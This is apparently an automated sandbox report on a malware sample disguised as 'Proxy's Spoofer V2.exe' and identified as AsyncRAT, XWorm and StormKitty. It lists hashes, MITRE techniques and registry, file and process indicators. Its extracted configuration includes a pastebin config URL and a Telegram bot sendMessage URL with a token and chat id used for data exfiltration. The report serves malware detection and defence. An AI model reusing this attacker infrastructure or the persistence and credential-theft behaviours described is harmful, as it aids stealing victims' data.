asyncrat | c2cb46401abaa50730f59e048b6d826a5ae5e3d03caae622e4c4d080bdf51262

Analysis

max time kernel
149s
max time network
150s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
13-11-2024 14:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

proxy's woofer/Proxy's Spoofer V2.exe
Size

6.0MB
MD5

710df7d1b2f1b2ee6753747d5c04b346
SHA1

294f0da01e406b2f58c132400385cb6f31d1c93e
SHA256

aa8b6bfba812dcd1a85296a313cf859837394b9f917313abba64fa7678a110ed
SHA512

b91a9e3cba368e6d3199f66817ab766e72ccc6556b8ee9abdaa50511e48fdb09ffa57b6548864f3e1b77fcdaeda7c30456aff90375fd3b3ee8267860f0fc2285
SSDEEP

98304:aEv4T1+hACMzMtXqIEO8ODEO4bTFF+LocldaK3//LMAEyHBso06:yTYbUVO8gWF+LDraK37MvJ6

Score

10^/10

asyncrat stormkitty xworm proxy defense_evasion discovery evasion execution persistence privilege_escalation rat spyware stealer trojan

Malware Config

Extracted

Family

asyncrat

Version

Venom Pwn3rzs' Edtition v6.0.1

Botnet

Proxy

Mutex

0rU9DnsLkR

Attributes

delay
1
install
true
install_file
NetworkEX.exe
install_folder
%AppData%
pastebin_config
https://pastebin.com/raw/RgYXYwVV

aes.plain

Extracted

Family

xworm

Attributes

Install_directory
%AppData%
install_file
NetworkEXP.exe
pastebin_url
https://pastebin.com/raw/RgYXYwVV
telegram
https://api.telegram.org/bot6554307825:AAFiCM4YZlx7R1yb0K0d5pqenjePI2Nljfc/sendMessage?chat_id=6077384108

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Detect Xworm Payload 3 IoCs

Processes:

resource	yara_rule
C:\Windows\Network.exe	family_xworm
behavioral3/memory/2912-59-0x00000000000D0000-0x00000000000EE000-memory.dmp	family_xworm
behavioral3/memory/2308-221-0x0000000001160000-0x000000000117E000-memory.dmp	family_xworm

StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\NetworkEX.exe	family_stormkitty
behavioral3/memory/2716-61-0x0000000000B40000-0x0000000000BD8000-memory.dmp	family_stormkitty

Stormkitty family
stormkitty
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\Network Experience.exe	family_asyncrat

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

2268 powershell.exe
2204
2720 powershell.exe
832 powershell.exe
2584 powershell.exe
448 powershell.exe
Modifies Windows Firewall 2 TTPs 2 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exe

pid process

3004 netsh.exe
2556
Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exe

pid process

1068 attrib.exe
2176 attrib.exe
Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

2172 cmd.exe

pid	process
2268	powershell.exe
2204
2720	powershell.exe
832	powershell.exe
2584	powershell.exe
448	powershell.exe

pid	process
3004	netsh.exe
2556

pid	process
1068	attrib.exe
2176	attrib.exe

pid	process
2172	cmd.exe

Drops startup file 2 IoCs

Processes:

Network.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetworkEXP.lnk	Network.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetworkEXP.lnk	Network.exe

Executes dropped EXE 16 IoCs

Processes:

NetworkEX.exeNetwork Experience.exeNetwork.exeNXT Cleaner.exeNetworkEX.exeNEX.exenExOs.exeKoks_Cleaner.exeAccuracyFN Swoofer.exeNetworkEX.exeCleaner.exemac.exe

pid	process
2748	NetworkEX.exe
2900	Network Experience.exe
2912	Network.exe
2860	NXT Cleaner.exe
2716	NetworkEX.exe
2676	NEX.exe
2652	nExOs.exe
2948	Koks_Cleaner.exe
2696	AccuracyFN Swoofer.exe
1232
3064	NetworkEX.exe
1320	Cleaner.exe
2572	mac.exe
2428
2308
1816

Loads dropped DLL 13 IoCs

Processes:

NetworkEX.exeProxy's Spoofer V2.execmd.execmd.exe

pid	process
2748	NetworkEX.exe
2784	Proxy's Spoofer V2.exe
2748	NetworkEX.exe
2748	NetworkEX.exe
2784	Proxy's Spoofer V2.exe
2784	Proxy's Spoofer V2.exe
2784	Proxy's Spoofer V2.exe
1592	cmd.exe
2368
2368
2368
2216	cmd.exe
1684

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

NetworkEX.exeNetwork.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\NetworkXE = "\"C:\\Users\\Admin\\AppData\\Roaming\\NetworkXE.exe\""	NetworkEX.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\NetworkEXP = "C:\\Users\\Admin\\AppData\\Roaming\\NetworkEXP.exe"	Network.exe

Drops desktop.ini file(s) 2 IoCs

Processes:

iexplore.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini	iexplore.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 15 IoCs

Web Service

T1102

Processes:

flow	ioc
53	discord.com
14	pastebin.com
22	pastebin.com
23	pastebin.com
54	discord.com
17	pastebin.com
18	pastebin.com
28	pastebin.com
27	pastebin.com
52	discord.com
10	pastebin.com
15	discord.com
26	pastebin.com
13	pastebin.com
55	discord.com

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

9 ip-api.com
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

flow	ioc
9	ip-api.com

Drops file in Windows directory 64 IoCs

Processes:

cmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	ioc	process
File opened for modification	C:\Windows\INF\netrass.inf	cmd.exe
File opened for modification	C:\Windows\INF\usbhub\0407\usbperf.ini
File opened for modification	C:\Windows\INF\netnwifi.inf
File opened for modification	C:\Windows\INF\SMSVCH~1.0\0409\_SMSvcHostPerfCounters_D.ini
File opened for modification	C:\Windows\INF\NETDAT~2\_dataperfcounters_shared12_neutral.h
File opened for modification	C:\Windows\INF\sceregvl.inf	cmd.exe
File opened for modification	C:\Windows\INF\NETDAT~1\_DataOracleClientPerfCounters_shared12_neutral.ini	cmd.exe
File opened for modification	C:\Windows\INF\MSDTC\0409\msdtcprf.ini	cmd.exe
File opened for modification	C:\Windows\INF\usbhub\0410\usbperf.ini
File opened for modification	C:\Windows\INF\UGTHRSVC\gthrctr.h
File opened for modification	C:\Windows\INF\NETFRA~1\CORPerfMonSymbols.h
File opened for modification	C:\Windows\INF\NETDAT~2\0407\_dataperfcounters_shared12_neutral_D.ini
File opened for modification	C:\Windows\INF\ESENT\0407\esentprf.ini	cmd.exe
File opened for modification	C:\Windows\INF\netvwififlt.inf	cmd.exe
File opened for modification	C:\Windows\INF\usbhub\0000\usbperf.ini
File opened for modification	C:\Windows\INF\NETCLR~2\_Networkingperfcounters.ini	cmd.exe
File opened for modification	C:\Windows\INF\NETDAT~1\0407\_DataOracleClientPerfCounters_shared12_neutral_D.ini	cmd.exe
File opened for modification	C:\Windows\INF\NETDAT~2\0407\_dataperfcounters_shared12_neutral_D.ini	cmd.exe
File opened for modification	C:\Windows\INF\NETDAT~1\0000\_DataOracleClientPerfCounters_shared12_neutral_D.ini
File opened for modification	C:\Windows\INF\NETCLR~2\0C0A\_Networkingperfcounters_D.ini
File opened for modification	C:\Windows\INF\usbhub\0000\usbperf.ini	cmd.exe
File opened for modification	C:\Windows\INF\UGTHRSVC\0C0A\gthrctr.ini	cmd.exe
File opened for modification	C:\Windows\INF\netpgm.inf	cmd.exe
File opened for modification	C:\Windows\INF\MSDTC\0409\msdtcprf.ini
File opened for modification	C:\Windows\INF\en-US\netavpnt.inf_loc
File opened for modification	C:\Windows\INF\TERMSE~1\0407\tslabels.ini	cmd.exe
File opened for modification	C:\Windows\INF\NETDAT~1\0000\_DataOracleClientPerfCounters_shared12_neutral_D.ini	cmd.exe
File opened for modification	C:\Windows\INF\REMOTE~1\0409\rasctrs.ini	cmd.exe
File opened for modification	C:\Windows\INF\NETDAT~2\_dataperfcounters_shared12_neutral.h	cmd.exe
File opened for modification	C:\Windows\INF\rdyboost\0409\ReadyBoostPerfCounters.ini	cmd.exe
File opened for modification	C:\Windows\INF\ESENT\0411\esentprf.ini
File opened for modification	C:\Windows\INF\fontsetup.inf
File opened for modification	C:\Windows\INF\WSEARC~1\idxcntrs.h
File opened for modification	C:\Windows\INF\NETCLR~1\0000\_DataPerfCounters_D.ini	cmd.exe
File opened for modification	C:\Windows\INF\BITS\040C\bitsctrs.ini	cmd.exe
File opened for modification	C:\Windows\INF\UGATHE~1\0411\gsrvctr.ini	cmd.exe
File opened for modification	C:\Windows\INF\WINDOW~1.0\040C\PerfCounters_D.ini
File opened for modification	C:\Windows\INF\MSDTCB~1.0\0409\_TransactionBridgePerfCounters_D.ini	cmd.exe
File opened for modification	C:\Windows\INF\ESENT\040C\esentprf.ini	cmd.exe
File opened for modification	C:\Windows\INF\TAPISRV\0411\tapiperf.ini
File opened for modification	C:\Windows\INF\ESENT\0C0A\esentprf.ini
File opened for modification	C:\Windows\INF\MSDTC\0411\msdtcprf.ini
File opened for modification	C:\Windows\INF\NETCLR~1\_DataPerfCounters.ini	cmd.exe
File opened for modification	C:\Windows\INF\ESENT\0409\esentprf.ini	cmd.exe
File opened for modification	C:\Windows\INF\MSDTC\0411\msdtcprf.ini	cmd.exe
File opened for modification	C:\Windows\INF\rdyboost\0409\ReadyBoostPerfCounters.ini
File opened for modification	C:\Windows\INF\nettcpip.inf	cmd.exe
File opened for modification	C:\Windows\INF\MSDTC\0411\msdtcprf.ini	cmd.exe
File opened for modification	C:\Windows\INF\WSEARC~1\0410\idxcntrs.ini	cmd.exe
File opened for modification	C:\Windows\INF\NETDAT~1\0409\_DataOracleClientPerfCounters_shared12_neutral_D.ini	cmd.exe
File opened for modification	C:\Windows\INF\nettcpip.inf	cmd.exe
File opened for modification	C:\Windows\INF\es-ES\netavpna.inf_loc
File opened for modification	C:\Windows\INF\fr-FR\netavpna.inf_loc	cmd.exe
File opened for modification	C:\Windows\INF\SERVIC~3.0\0C0A\_ServiceModelOperationPerfCounters_D.ini
File opened for modification	C:\Windows\INF\usbhub\0410\usbperf.ini	cmd.exe
File opened for modification	C:\Windows\INF\SERVIC~1.0\0407\_ServiceModelEndpointPerfCounters_D.ini
File opened for modification	C:\Windows\INF\apps.inf
File opened for modification	C:\Windows\INF\WSEARC~1\0410\idxcntrs.ini
File opened for modification	C:\Windows\INF\netvwififlt.inf
File opened for modification	C:\Windows\INF\es-ES\netavpna.inf_loc	cmd.exe
File opened for modification	C:\Windows\INF\TERMSE~1\tslabels.h	cmd.exe
File opened for modification	C:\Windows\INF\MSDTCB~1.0\0C0A\_TransactionBridgePerfCounters_D.ini	cmd.exe
File opened for modification	C:\Windows\INF\TAPISRV\0000\tapiperf.ini
File opened for modification	C:\Windows\INF\WSEARC~1\idxcntrs.h

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 42 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

powershell.exeIEXPLORE.EXEProxy's Spoofer V2.exeNetworkEX.exepowershell.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Proxy's Spoofer V2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NetworkEX.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 10 IoCs
Adversaries may check for Internet connectivity on compromised systems.
discovery

Internet Connection Discovery
T1016.001

Processes:

cmd.execmd.execmd.exereg.execmd.exereg.exe

pid process

1724
1532
848 cmd.exe
1764 cmd.exe
1108 cmd.exe
2632 reg.exe
1352 cmd.exe
1292 reg.exe
2720
2596

pid	process
1724
1532
848	cmd.exe
1764	cmd.exe
1108	cmd.exe
2632	reg.exe
1352	cmd.exe
1292	reg.exe
2720
2596

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

reg.exereg.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Delays execution with timeout.exe 3 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

2128 timeout.exe
1476 timeout.exe
2388

pid	process
2128	timeout.exe
1476	timeout.exe
2388

Enumerates system info in registry 2 TTPs 38 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

reg.exereg.exereg.exeCleaner.exereg.exereg.exereg.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier	reg.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier = "24185-9931-2864526905"	reg.exe
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	Cleaner.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1	Cleaner.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1	Cleaner.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier = "Paste-24201-30905-1966216150"	reg.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier = "Paste-24201-30905-1966216150"	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral	Cleaner.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier = "4cc4e-d999-f5281d8d38"	Cleaner.exe
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier = "Paste-24299-25677-3129917153"
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct = "24185993128645"	reg.exe
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1	reg.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral	Cleaner.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier	Cleaner.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct = "Paste-242961492813435"
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier	reg.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier = "24185-9931-2864526905"	reg.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct = "Paste-242013090519662"	reg.exe
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	reg.exe
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier = "Paste-24299-25677-3129917153"
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral	Cleaner.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	Cleaner.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier = "af5ea-422f-45341ebac8"	Cleaner.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier	Cleaner.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier	reg.exe

Gathers network information 2 TTPs 6 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command and Scripting Interpreter
T1059

Processes:

ipconfig.exeipconfig.exeipconfig.exe

pid process

1352
2584 ipconfig.exe
1644 ipconfig.exe
2096 ipconfig.exe
1344
2284

pid	process
1352
2584	ipconfig.exe
1644	ipconfig.exe
2096	ipconfig.exe
1344
2284

Kills process with taskkill 11 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
1036	taskkill.exe
1776	taskkill.exe
2260	taskkill.exe
1660	taskkill.exe
1060	taskkill.exe
2072	taskkill.exe
616	taskkill.exe
2608	taskkill.exe
2476	taskkill.exe
576	taskkill.exe
2132	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 47 IoCs

adware spyware

Modify Registry

T1112

Processes:

reg.exereg.exeiexplore.exeIEXPLORE.EXECleaner.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Migration\IE Installed Date = 02419820156179824854125581276431683762619058	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Migration	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Migration\IE Installed Date = 60bd5531a175ff04fd2ac82b39994e627b65768a68ae	Cleaner.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Migration\IE Installed Date = 02420819633226223150810734245448252316123056	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\DOMStorage
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "437668460"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\DOMStorage\discord.com\NumberOfSubdomains = "1"
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Migration\IE Installed Date = 2430336571639584481494473472091225723140
